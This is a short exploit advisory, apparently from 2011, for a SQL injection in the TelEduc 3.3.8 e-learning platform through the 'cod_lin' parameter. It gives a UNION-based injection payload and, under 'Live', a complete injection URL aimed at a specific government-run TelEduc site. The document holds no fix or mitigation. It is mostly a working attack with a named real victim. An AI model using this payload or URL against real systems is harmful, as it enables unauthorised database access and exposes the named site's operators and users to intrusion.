TelEduc version 3.3.8 suffers from a remote SQL injection vulnerability.
502c12e148de850d1591013289a870c298ea18e5721ac49128802f2d722a7e01
# By s4r4d0 - 2011 © # Made in Brazil
#########################################################################
# TelEduc Version 3.3.8
#########################################################################
# Name: TelEduc Version 3.3.8 ( SQL Injection Vulnerability )
# Download: http://www.teleduc.org.br/pagina/download-teleduc/
# Date: 12/06/2011
# Author: s4r4d0
# E-mail: s4r4d0[at]yhaoo[dot]com
# Team: Fatal Error
# Twitter: www.twitter.com/fatalerrorcrew
================================================================================
================================================================================
[#] vuln:
http://www.example.com.br/~teleduc/pagina_inicial/index.php?cod_lin=[SQLi]
[#] Exploit:
-9999 union select 1,@@version--
[#] Live:
http://www.eadpm.polmil.sp.gov.br/~teleduc/pagina_inicial/index.php?cod_lin=-9999 union select 1,@@version--
================================================================================
================================================================================